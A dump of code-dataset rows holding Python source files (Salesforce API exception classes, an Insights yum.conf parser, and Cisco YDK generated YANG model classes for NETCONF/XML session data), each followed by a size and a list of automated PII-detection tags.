Determines which error to raise for bad results"""""" + try: + response_content = result.json() + except Exception: + response_content = result.text + + exc_map = { + 300: SalesforceMoreThanOneRecord, + 400: SalesforceMalformedRequest, + 401: SalesforceExpiredSession, + 403: SalesforceRefusedRequest, + 404: SalesforceResourceNotFound, + } + exc_cls = exc_map.get(result.status_code, SalesforceGeneralError) + + raise exc_cls(result.url, result.status_code, name, response_content) + + +class SalesforceMoreThanOneRecord(SalesforceError): + """""" + Error Code: 300 + The value returned when an external ID exists in more than one record. The + response body contains the list of matching records. + """""" + message = u""More than one record for {url}. Response content: {content}"" + + +class SalesforceMalformedRequest(SalesforceError): + """""" + Error Code: 400 + The request couldn't be understood, usually because the JSON or XML body contains an error. + """""" + message = u""Malformed request {url}. Response content: {content}"" + + +class SalesforceExpiredSession(SalesforceError): + """""" + Error Code: 401 + The session ID or OAuth token used has expired or is invalid. The response + body contains the message and errorCode. + """""" + message = u""Expired session for {url}. Response content: {content}"" + + +class SalesforceRefusedRequest(SalesforceError): + """""" + Error Code: 403 + The request has been refused. Verify that the logged-in user has + appropriate permissions. + """""" + message = u""Request refused for {url}. Response content: {content}"" + + +class SalesforceResourceNotFound(SalesforceError): + """""" + Error Code: 404 + The requested resource couldn't be found. Check the URI for errors, and + verify that there are no sharing issues. + """""" + message = u'Resource {name} Not Found. Response content: {content}' + + def __str__(self): + return self.message.format(name=self.resource_name, + content=self.content) + + +class SalesforceGeneralError(SalesforceError): + """""" + A non-specific Salesforce error. + """""" + message = u'Error Code {status}.
Response content: {content}' + + def __str__(self): + return self.message.format(status=self.status, content=self.content) +",27053,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://na1.salesforce.com'], ['URL', 'https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm'], ['DATE_TIME', ""'29.0'""], ['URL', 'urllib.pa'], ['NRP', 'OrderedDict'], ['PERSON', 'ordereddict import'], ['PERSON', 'OrderedDict'], ['LOCATION', 'security_token'], ['PERSON', 'simple_salesforce'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['URL', 'self.au'], ['PERSON', 'self.sf_instance ='], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['LOCATION', 'SalesforceAPI'], ['PERSON', 'name.startswith'], ['LOCATION', 'self.sf_instance'], ['URL', 'self.ba'], ['URL', 'self.re'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['PERSON', 'Waldo'], ['NRP', 'SOQL'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['PERSON', 'exception_handler(result'], ['NRP', 'query_more(self'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'url.fo'], ['URL', 'self.request.ge'], ['PERSON', 'exception_handler(result'], ['NRP', 'SOQL'], ['NRP', 'previous_result'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'session_id'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['LOCATION', 'custom_id_field'], ['PERSON', 'custom_id_field'], ['URL', 'self.ba'], ['LOCATION', 'custom_id_field'], ['LOCATION', 'custom_id_field'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'SalesforceResourceNotFound'], ['URL', 'result.st'], ['URL', 'https://test.salesforce.com'], ['URL', 'https://login.salesforce.com'], ['URL', 'https://github.com/heroku/simple-salesforce/issues/60'], ['URL', 'test.salesforce.com'], ['URL', 'login.salesforce.com'], ['URL', 'na1.salesforce.com'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.au'], ['URL', 'self.se'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.se'], ['URL', 'self.au'], ['URL', 'self.se'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.sa'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.re'], ['URL', 'requests.Se'], ['URL', 'self.request.pro'], ['URL', 'self.pro'], ['URL', 'self.se'], ['URL', 'result.co'], ['URL', 'instance.Lead.me'], ['URL', 'name.st'], ['URL', 'self.se'], ['URL', 'self.pro'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'self.se'], ['URL', 'email.com'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'email.com'], ['URL', 'requests.re'], ['URL', 'result.st'], ['URL', 'requests.re'], ['URL', 'self.request.re'], ['URL', 
'result.st'], ['URL', 'self.se'], ['URL', 'self.na'], ['URL', 'self.re'], ['URL', 'requests.Se'], ['URL', 'self.request.pro'], ['URL', 'requests.Re'], ['URL', 'requests.Re'], ['URL', 'requests.Re'], ['URL', 'requests.re'], ['URL', 'self.se'], ['URL', 'self.request.re'], ['URL', 'result.st'], ['URL', 'self.na'], ['URL', 'requests.Re'], ['URL', 'response.st'], ['URL', 'test.salesforce.com'], ['URL', 'login.salesforce.com'], ['URL', 'map.ge'], ['URL', 'result.st'], ['URL', 'self.message.fo'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'self.message.fo'], ['URL', 'self.st'], ['URL', 'self.co']]" +102,""""""" +YumConf - file ``/etc/yum.conf`` +================================ + +This module provides parsing for the ``/etc/yum.conf`` file. +The ``YumConf`` class parses the information in the file +``/etc/yum.conf``. See the ``IniConfigFile`` class for more +information on attributes and methods. + +Sample input data looks like:: + + [main] + + cachedir=/var/cache/yum/$basearch/$releasever + keepcache=0 + debuglevel=2 + logfile=/var/log/yum.log + exactarch=1 + obsoletes=1 + gpgcheck=1 + plugins=1 + installonly_limit=3 + + [rhel-7-server-rpms] + + metadata_expire = 86400 + baseurl = https://cdn.redhat.com/content/rhel/server/7/$basearch + name = Red Hat Enterprise Linux 7 Server (RPMs) + gpgkey = PI:KEY + enabled = 1 + gpgcheck = 1 + +Examples: + + >>> yconf = shared[YumConf] + >>> yconf.defaults() + {'admin_token': 'ADMIN', 'compute_port': '8774'} + >>> 'main' in yconf + True + >>> 'rhel-7-server-rpms' in yconf + True + >>> yconf.has_option('main', 'gpgcheck') + True + >>> yconf.has_option('main', 'foo') + False + >>> yconf.get('rhel-7-server-rpms', 'enabled') + '1' + >>> yconf.items('main') + {'plugins': '1', + 'keepcache': '0', + 'cachedir': '/var/cache/yum/$basearch/$releasever', + 'exactarch': '1', + 'obsoletes': '1', + 'installonly_limit': '3', + 'debuglevel': '2', + 'gpgcheck': '1', + 'logfile': '/var/log/yum.log'} +"""""" + +from insights.contrib.ConfigParser import NoOptionError +from .. import parser, IniConfigFile +from insights.specs import yum_conf + + +@parser(yum_conf) +class YumConf(IniConfigFile): + """"""Parse contents of file ``/etc/yum.conf``."""""" + def parse_content(self, content): + super(YumConf, self).parse_content(content) + # File /etc/yum.conf may contain repos definitions. + # Keywords 'gpgkey' and 'baseurl' might contain multiple + # values separated by comma. Convert those values into a list. + for section in self.sections(): + for key in ('gpgkey', 'baseurl'): + try: + value = self.get(section, key) + if value and isinstance(value, str): + self.data.set(section, key, value.split(',')) + except NoOptionError: + pass +",2282,"[['URL', 'https://cdn.redhat.com/content/rhel/server/7/$basearch'], ['PERSON', 'YumConf'], ['PERSON', 'admin_token'], ['PERSON', 'keepcache'], ['PERSON', 'exactarch'], ['PERSON', 'obsoletes'], ['LOCATION', 'insights.contrib'], ['PERSON', 'Parse'], ['IP_ADDRESS', 'e::\n\n '], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'yconf.de'], ['URL', 'yconf.ge'], ['URL', 'yconf.it'], ['URL', 'insights.contrib.Co'], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'self.data.se']]" +103,""""""" Cisco_IOS_XR_man_xml_ttyagent_oper + +This module contains a collection of YANG definitions +for Cisco IOS\-XR man\-xml\-ttyagent package operational data. 
+ +This module contains definitions +for the following management objects\: + netconf\: NETCONF operational information + xr\-xml\: xr xml + +Copyright (c) 2013\-2016 by Cisco Systems, Inc. +All rights reserved. + +"""""" + + +import re +import collections + +from enum import Enum + +from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict + +from ydk.errors import YPYError, YPYModelError + + + +class XrXmlSessionAlarmRegisterEnum(Enum): + """""" + XrXmlSessionAlarmRegisterEnum + + AlarmNotify + + .. data:: registered = 1 + + Registered + + .. data:: not_registered = 2 + + NotRegistered + + """""" + + registered = 1 + + not_registered = 2 + + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXmlSessionAlarmRegisterEnum'] + + +class XrXmlSessionStateEnum(Enum): + """""" + XrXmlSessionStateEnum + + SessionState + + .. data:: idle = 1 + + Idle + + .. data:: busy = 2 + + Busy + + """""" + + idle = 1 + + busy = 2 + + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXmlSessionStateEnum'] + + + +class Netconf(object): + """""" + NETCONF operational information + + .. attribute:: agent + + NETCONF agent operational information + **type**\: :py:class:`Agent ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.agent = Netconf.Agent() + self.agent.parent = self + + + class Agent(object): + """""" + NETCONF agent operational information + + .. attribute:: tty + + NETCONF agent over TTY + **type**\: :py:class:`Tty ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.tty = Netconf.Agent.Tty() + self.tty.parent = self + + + class Tty(object): + """""" + NETCONF agent over TTY + + .. attribute:: sessions + + Session information + **type**\: :py:class:`Sessions ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.sessions = Netconf.Agent.Tty.Sessions() + self.sessions.parent = self + + + class Sessions(object): + """""" + Session information + + .. attribute:: session + + Session information + **type**\: list of :py:class:`Session ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session = YList() + self.session.parent = self + self.session.name = 'session' + + + class Session(object): + """""" + Session information + + .. attribute:: session_id + + Session ID + **type**\: int + + **range:** \-2147483648..2147483647 + + .. attribute:: admin_config_session_id + + Admin config session ID + **type**\: str + + .. attribute:: alarm_notification + + is the session registered for alarm notifications + **type**\: :py:class:`XrXmlSessionAlarmRegisterEnum ` + + .. attribute:: client_address + + ip address of the client + **type**\: str + + .. attribute:: client_port + + client's port + **type**\: int + + **range:** 0..4294967295 + + .. attribute:: config_session_id + + Config session ID + **type**\: str + + .. attribute:: elapsed_time + + Elapsed time(seconds) since a session is created + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. 
attribute:: last_state_change + + Time(seconds) since last session state change happened + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: start_time + + session start time in seconds since the Unix Epoch + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: state + + state of the session idle/busy + **type**\: :py:class:`XrXmlSessionStateEnum ` + + .. attribute:: username + + Username + **type**\: str + + .. attribute:: vrf_name + + VRF name + **type**\: str + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session_id = None + self.admin_config_session_id = None + self.alarm_notification = None + self.client_address = None + self.client_port = None + self.config_session_id = None + self.elapsed_time = None + self.last_state_change = None + self.start_time = None + self.state = None + self.username = None + self.vrf_name = None + + @property + def _common_path(self): + if self.session_id is None: + raise YPYModelError('Key property session_id is None') + + return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session_id is not None: + return True + + if self.admin_config_session_id is not None: + return True + + if self.alarm_notification is not None: + return True + + if self.client_address is not None: + return True + + if self.client_port is not None: + return True + + if self.config_session_id is not None: + return True + + if self.elapsed_time is not None: + return True + + if self.last_state_change is not None: + return True + + if self.start_time is not None: + return True + + if self.state is not None: + return True + + if self.username is not None: + return True + + if self.vrf_name is not None: + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf.Agent.Tty.Sessions.Session']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session is not None: + for child_ref in self.session: + if child_ref._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf.Agent.Tty.Sessions']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.sessions is not None and self.sessions._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf.Agent.Tty']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.tty is not None and self.tty._has_data(): + return True + + return False + + @staticmethod + def 
_meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf.Agent']['meta_info'] + + @property + def _common_path(self): + + return '/Cisco-IOS-XR-man-xml-ttyagent-oper:netconf' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.agent is not None and self.agent._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['Netconf']['meta_info'] + + +class XrXml(object): + """""" + xr xml + + .. attribute:: agent + + XML agents + **type**\: :py:class:`Agent ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.agent = XrXml.Agent() + self.agent.parent = self + + + class Agent(object): + """""" + XML agents + + .. attribute:: default + + Default sessions information + **type**\: :py:class:`Default ` + + .. attribute:: ssl + + SSL sessions information + **type**\: :py:class:`Ssl ` + + .. attribute:: tty + + TTY sessions information + **type**\: :py:class:`Tty ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.default = XrXml.Agent.Default() + self.default.parent = self + self.ssl = XrXml.Agent.Ssl() + self.ssl.parent = self + self.tty = XrXml.Agent.Tty() + self.tty.parent = self + + + class Tty(object): + """""" + TTY sessions information + + .. attribute:: sessions + + sessions information + **type**\: :py:class:`Sessions ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.sessions = XrXml.Agent.Tty.Sessions() + self.sessions.parent = self + + + class Sessions(object): + """""" + sessions information + + .. attribute:: session + + xml sessions information + **type**\: list of :py:class:`Session ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session = YList() + self.session.parent = self + self.session.name = 'session' + + + class Session(object): + """""" + xml sessions information + + .. attribute:: session_id + + Session Id + **type**\: int + + **range:** \-2147483648..2147483647 + + .. attribute:: admin_config_session_id + + Admin config session ID + **type**\: str + + .. attribute:: alarm_notification + + is the session registered for alarm notifications + **type**\: :py:class:`XrXmlSessionAlarmRegisterEnum ` + + .. attribute:: client_address + + ip address of the client + **type**\: str + + .. attribute:: client_port + + client's port + **type**\: int + + **range:** 0..4294967295 + + .. attribute:: config_session_id + + Config session ID + **type**\: str + + .. attribute:: elapsed_time + + Elapsed time(seconds) since a session is created + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: last_state_change + + Time(seconds) since last session state change happened + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: start_time + + session start time in seconds since the Unix Epoch + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: state + + state of the session idle/busy + **type**\: :py:class:`XrXmlSessionStateEnum ` + + .. 
attribute:: username + + Username + **type**\: str + + .. attribute:: vrf_name + + VRF name + **type**\: str + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session_id = None + self.admin_config_session_id = None + self.alarm_notification = None + self.client_address = None + self.client_port = None + self.config_session_id = None + self.elapsed_time = None + self.last_state_change = None + self.start_time = None + self.state = None + self.username = None + self.vrf_name = None + + @property + def _common_path(self): + if self.session_id is None: + raise YPYModelError('Key property session_id is None') + + return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session_id is not None: + return True + + if self.admin_config_session_id is not None: + return True + + if self.alarm_notification is not None: + return True + + if self.client_address is not None: + return True + + if self.client_port is not None: + return True + + if self.config_session_id is not None: + return True + + if self.elapsed_time is not None: + return True + + if self.last_state_change is not None: + return True + + if self.start_time is not None: + return True + + if self.state is not None: + return True + + if self.username is not None: + return True + + if self.vrf_name is not None: + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Tty.Sessions.Session']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session is not None: + for child_ref in self.session: + if child_ref._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Tty.Sessions']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.sessions is not None and self.sessions._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Tty']['meta_info'] + + + class Default(object): + """""" + Default sessions information + + .. attribute:: sessions + + sessions information + **type**\: :py:class:`Sessions ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.sessions = XrXml.Agent.Default.Sessions() + self.sessions.parent = self + + + class Sessions(object): + """""" + sessions information + + .. 
attribute:: session + + xml sessions information + **type**\: list of :py:class:`Session ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session = YList() + self.session.parent = self + self.session.name = 'session' + + + class Session(object): + """""" + xml sessions information + + .. attribute:: session_id + + Session Id + **type**\: int + + **range:** \-2147483648..2147483647 + + .. attribute:: admin_config_session_id + + Admin config session ID + **type**\: str + + .. attribute:: alarm_notification + + is the session registered for alarm notifications + **type**\: :py:class:`XrXmlSessionAlarmRegisterEnum ` + + .. attribute:: client_address + + ip address of the client + **type**\: str + + .. attribute:: client_port + + client's port + **type**\: int + + **range:** 0..4294967295 + + .. attribute:: config_session_id + + Config session ID + **type**\: str + + .. attribute:: elapsed_time + + Elapsed time(seconds) since a session is created + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: last_state_change + + Time(seconds) since last session state change happened + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: start_time + + session start time in seconds since the Unix Epoch + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: state + + state of the session idle/busy + **type**\: :py:class:`XrXmlSessionStateEnum ` + + .. attribute:: username + + Username + **type**\: str + + .. attribute:: vrf_name + + VRF name + **type**\: str + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session_id = None + self.admin_config_session_id = None + self.alarm_notification = None + self.client_address = None + self.client_port = None + self.config_session_id = None + self.elapsed_time = None + self.last_state_change = None + self.start_time = None + self.state = None + self.username = None + self.vrf_name = None + + @property + def _common_path(self): + if self.session_id is None: + raise YPYModelError('Key property session_id is None') + + return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session_id is not None: + return True + + if self.admin_config_session_id is not None: + return True + + if self.alarm_notification is not None: + return True + + if self.client_address is not None: + return True + + if self.client_port is not None: + return True + + if self.config_session_id is not None: + return True + + if self.elapsed_time is not None: + return True + + if self.last_state_change is not None: + return True + + if self.start_time is not None: + return True + + if self.state is not None: + return True + + if self.username is not None: + return True + + if self.vrf_name is not None: + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Default.Sessions.Session']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + 
if self.session is not None: + for child_ref in self.session: + if child_ref._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Default.Sessions']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.sessions is not None and self.sessions._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Default']['meta_info'] + + + class Ssl(object): + """""" + SSL sessions information + + .. attribute:: sessions + + sessions information + **type**\: :py:class:`Sessions ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.sessions = XrXml.Agent.Ssl.Sessions() + self.sessions.parent = self + + + class Sessions(object): + """""" + sessions information + + .. attribute:: session + + xml sessions information + **type**\: list of :py:class:`Session ` + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session = YList() + self.session.parent = self + self.session.name = 'session' + + + class Session(object): + """""" + xml sessions information + + .. attribute:: session_id + + Session Id + **type**\: int + + **range:** \-2147483648..2147483647 + + .. attribute:: admin_config_session_id + + Admin config session ID + **type**\: str + + .. attribute:: alarm_notification + + is the session registered for alarm notifications + **type**\: :py:class:`XrXmlSessionAlarmRegisterEnum ` + + .. attribute:: client_address + + ip address of the client + **type**\: str + + .. attribute:: client_port + + client's port + **type**\: int + + **range:** 0..4294967295 + + .. attribute:: config_session_id + + Config session ID + **type**\: str + + .. attribute:: elapsed_time + + Elapsed time(seconds) since a session is created + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: last_state_change + + Time(seconds) since last session state change happened + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: start_time + + session start time in seconds since the Unix Epoch + **type**\: int + + **range:** 0..4294967295 + + **units**\: second + + .. attribute:: state + + state of the session idle/busy + **type**\: :py:class:`XrXmlSessionStateEnum ` + + .. attribute:: username + + Username + **type**\: str + + .. 
attribute:: vrf_name + + VRF name + **type**\: str + + + + """""" + + _prefix = 'man-xml-ttyagent-oper' + _revision = '2015-07-30' + + def __init__(self): + self.parent = None + self.session_id = None + self.admin_config_session_id = None + self.alarm_notification = None + self.client_address = None + self.client_port = None + self.config_session_id = None + self.elapsed_time = None + self.last_state_change = None + self.start_time = None + self.state = None + self.username = None + self.vrf_name = None + + @property + def _common_path(self): + if self.session_id is None: + raise YPYModelError('Key property session_id is None') + + return 'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = ' + str(self.session_id) + ']' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session_id is not None: + return True + + if self.admin_config_session_id is not None: + return True + + if self.alarm_notification is not None: + return True + + if self.client_address is not None: + return True + + if self.client_port is not None: + return True + + if self.config_session_id is not None: + return True + + if self.elapsed_time is not None: + return True + + if self.last_state_change is not None: + return True + + if self.start_time is not None: + return True + + if self.state is not None: + return True + + if self.username is not None: + return True + + if self.vrf_name is not None: + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Ssl.Sessions.Session']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.session is not None: + for child_ref in self.session: + if child_ref._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Ssl.Sessions']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.sessions is not None and self.sessions._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent.Ssl']['meta_info'] + + @property + def _common_path(self): + + return 'PI:KEY' + + def is_config(self): + ''' Returns True if this instance represents config data else returns False ''' + return False + + def _has_data(self): + if self.default is not None and self.default._has_data(): + return True + + if self.ssl is not None and self.ssl._has_data(): + return True + + if self.tty is not None and self.tty._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml.Agent']['meta_info'] + + @property + def _common_path(self): + + return '/Cisco-IOS-XR-man-xml-ttyagent-oper:xr-xml' + + def is_config(self): + ''' Returns True if this instance represents config data else returns 
False ''' + return False + + def _has_data(self): + if self.agent is not None and self.agent._has_data(): + return True + + return False + + @staticmethod + def _meta_info(): + from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta + return meta._meta_table['XrXml']['meta_info'] + + +",41298,"[['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['UK_NHS', '2147483648'], ['PERSON', 'Enum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['PERSON', ""Agent']['meta_info""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['DATE_TIME', ""2015-07-30'""], ['PERSON', 'class:`XrXmlSessionAlarmRegisterEnum'], ['DATE_TIME', 'seconds'], ['PERSON', 'class:`XrXmlSessionStateEnum'], ['DATE_TIME', ""2015-07-30'""], ['PERSON', ""Agent']['meta_info""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'e:: '], ['URL', 'ydk.er'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Ag'], ['URL', 'self.ag'], ['URL', 'Netconf.Ag'], ['URL', 'self.agent.pa'], ['URL', 'ydk.models.ci'], ['URL', 'xr.Ci'], ['URL', 'oper.Netconf.Agent.Tt'], ['URL', 'self.pa'], ['URL', 'self.tt'], ['URL', 